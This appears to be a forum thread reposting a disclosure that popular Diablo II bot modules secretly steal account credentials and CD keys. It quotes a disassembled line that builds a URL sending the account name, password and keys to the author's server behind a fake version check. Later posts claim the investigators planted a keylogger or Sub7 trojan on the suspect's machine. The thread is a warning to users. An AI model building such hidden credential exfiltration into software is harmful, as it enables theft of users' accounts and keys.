This is crazy ..... ~Temp stuck

_CM

Respected Member
Joined
May 19, 2003
Messages
3,874
Reaction score
3
Location
Luxembourg
This post was originally posted at Blizzhackers.com. Netter's programs (such as Meph- and Pindlesweeper) seem to submit your information to some sort of script on netter's server. Here's the whole thread

Hellmonkeyz said:
Netter (nhnhnh) is the owner of netterhaufen.de and creator of Pindle Sweeper, Meph Sweeper, Chess, and other modules.

Netter acts like a nice guy to most, however, he is hiding a dark secret. His Pindle and Meph Bots are embedded with account and CD-Key stealing devices. Don't believe me? Take a look at this image provided to me by an anonymous user for use in this document:



This is a screen shot of his desktop, looking at a peculiar page at netterhaufen.de. This page is where he views his log of stolen accounts and keys. As you can see, I blocked out the passwords to protect the innocent. The CD-Key's mostly say N/A, however, there are some listed in that log, and I am sorry for whomever got scammed my Netter. I believe it grabs the CD-Key's from the registry, so only if you have used Onlyer's CD-Key Refiller will it be able to steal them. You may have noticed that at his website he started selling accounts as well as CD-Keys. I think you can make the connection of where these are coming from. You can visit the page in the screen shot and see the log, however, it requires a password to view the data, otherwise it is all ***'s. I am not telling anyone the password, so don't ask, and he's probably going to remove that page soon anyways.

Now, in case you are wondering, the PS and MS modules connect to http://www.netterhaufen.de/info/info.php to place the data in a text file which the http://www.netterhaufen.de/info/log.php file reads. If you want, you can disassemble the .d2h modules to see it for yourself.

This is how I found it in the newest MephSweeper module. First I used ASPackDie v1.41 to unpack ms.d2h. Now, you should be able to view the "real" module with a Hex Editor or a Disassembler. I disassembled it with OllyDbg to find the exact location of where the logging is taking place. Here is where I found the formatted string:
Code:
00AB16A2  |. 68 CC93AB00    PUSH unpacked.00AB93CC                   ; |format = "http://www.netterhaufen.de/info/info.php?t=%s&c=%s&a=%s&p=%s&r=%s&k1=%s&k2=%s&b=MephSweeper 0.4&g=%s"
The first variable (t=) is the time, the second (c=) is the character name, the third (a=) is the account, the fourth (p=) is the password, the fifth (r=) is the realm, the sixth (k1) is the classic key, the sixth (k2) is the expansion key, the seventh (b=) is the name of the bot (MephSweeper 0.4 in this case), and the last (g=) is the game type (expansion or normal). Then, after it he simply calls that URL with a WININET.InternetOpenURL and the PHP script does the rest. In between this it has some bullshit "checking version" things which are just a cover up. "Please standby, while we check your module version.." and "Great! You are using the most recent version." are just the bullshit messages Netter uses.



Here you can see in OllyDbg where this is at (I removed my start bar from the image). You can see the formatted string highlighted there, and above it is where he sets the time, and above it even further by "d2xcdkey" is where he grabs the key from the registry. Take a look around there if you want.

Now, if this isn't enough proof, I am not sure what is. Go ahead and view it on your own if you want, and other people who have the ability to do this can confirm it.

P.S -- Here is a (better) shot of Netter's desktop and part of a MSN conversation with Abinn, to prove that it is his computer and desktop:








MORE IMAGES
Netter copying a CD-Key from his stolen account // key log to his list of CD-Key's:


Netter copying CD-Key's from his list of keys to an E-Mail that he is sending to someone who bought some keys from his site:


This is me on Netter's log showing the CD-Key that he has sold to someone that Netter claims: "You can buy 100% working, brand-new and safe CD-Keys that work on every Realm! These CD-Keys have never been used before and each key will be sold only once to a customer."


(All these images have passwords and keys blurred out to protect the innocent, which Netter has unfortunently not done.)


- Hellmonkeys
I strongly advice you all to remove Mephsweeper/Pindlesweeper from your system, change all your passwords to accounts and scan your system for more malicious software.

~coolmission
 

shimshimheyxD

Member!
Joined
Aug 26, 2004
Messages
1,342
Reaction score
0
Location
New Jersey
Website
Visit site
Holy crap.. man thxs..
 

t.A.T.u97

BattleForums Senior Member
Joined
May 26, 2003
Messages
2,491
Reaction score
0
Location
t.A.T.u Land!
Website
www.tatu.us
NTPK And other Netter things infected?

Well read title, are the other things from the netter site infected? I have had ntpk for a while and I still have my account. Anyone knows?
 

_CM

Respected Member
Joined
May 19, 2003
Messages
3,874
Reaction score
3
Location
Luxembourg
maybe... i wouldn't use any of his stuff anymore....
 

shimshimheyxD

Member!
Joined
Aug 26, 2004
Messages
1,342
Reaction score
0
Location
New Jersey
Website
Visit site
how do u unblur things in photoshop :)
 

Odysee

Member!
Joined
Sep 19, 2004
Messages
65
Reaction score
0
well. before i read this, i logged on my char acc everything, and my fire sorc was totaly naked, except for the cta, lidles, arach, and magefist. i dno how it happened, but could it have to do with this? my invent and chest btw, where still intact.

EDIT: theres a little gap at the right bottom of my inventory, thats where i kept my anni, wich is gona too. someone defenatly has been on my acc, but noone i know could do that, as my password just doesnt make any sense at all :D

EDIT2: the Cta was on switch, so they prob didnt see it in the hurry.
 

UnsaNe

Member!
Joined
Oct 24, 2004
Messages
428
Reaction score
0
im glad that most of the time i told ppl to use d2jsp or rishodi's
 

Korittke

Member!
Joined
Dec 30, 2002
Messages
5,993
Reaction score
0
Website
Visit site
Netter seems to be a total noob, he doesn't even know how to properly read the CD keys from the D2 directory.
 

Brandon

Member!
Joined
Sep 12, 2004
Messages
4,055
Reaction score
3
Wow, how did he know? Im confused. Well i have a question.. If you never use hacks can you be scammed still?
 

Jimbo

Member!
Joined
Jul 11, 2003
Messages
4,493
Reaction score
11
Website
Visit site
coRtALoX said:
Wow, how did he know? Im confused. Well i have a question.. If you never use hacks can you be scammed still?

yes,on battlenet you can,but not using hacks decreases your chances of having acc/and passes stolen by like 80%
 

shimshimheyxD

Member!
Joined
Aug 26, 2004
Messages
1,342
Reaction score
0
Location
New Jersey
Website
Visit site
Ok heres to whole story..

Hellmonkey and Ninjai gave Netter a keylogger and sum how it took pictures of netters things.
 

Brandon

Member!
Joined
Sep 12, 2004
Messages
4,055
Reaction score
3
Jim Morrison said:
yes,on battlenet you can,but not using hacks decreases your chances of having acc/and passes stolen by like 80%
Thanks.. i got really scared. :doh
 

Syk

Member!
Joined
Dec 2, 2004
Messages
45
Reaction score
0
Yep the person who took those screenshots infected Netter with a Sub7 trojan or something similar. If he really wanted they could probably really mess up netters computer now.
 

NewPosts

New threads

Top